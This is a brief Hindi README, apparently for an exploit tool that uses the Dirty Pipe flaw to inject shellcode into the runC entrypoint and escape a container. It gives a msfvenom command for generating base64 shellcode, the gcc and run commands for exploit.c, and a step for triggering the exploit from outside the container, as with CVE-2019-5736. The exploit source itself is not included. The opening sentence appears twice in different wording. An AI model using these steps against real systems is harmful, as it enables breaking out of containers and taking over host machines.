
एक सरल शोषण जो dirtypipe का उपयोग करके runC एंट्रीपॉइंट में shellcode इंजेक्ट करता है ताकि कंटेनर एस्केप को लागू किया जा सके।
एक सरल एक्सप्लॉइट जो डर्टीपाइप का उपयोग करके runC एंट्रीपॉइंट में शेलकोड इंजेक्ट करता है ताकि कंटेनर एस्केप को कार्यान्वित किया जा सके।
msf का उपयोग करके base64 एन्कोडेड शेलकोड तैयार करें:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
कंटेनर में कंपाइल करें और चलाएं, अधिलेखित फ़ाइल नाम वह बिन है जिसे runC कंटेनर में निष्पादित करेगा (जैसे /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
CVE-2019-5736 की तरह कंटेनर के बाहर एक्सप्लॉइट और शेलकोड ट्रिगर करें।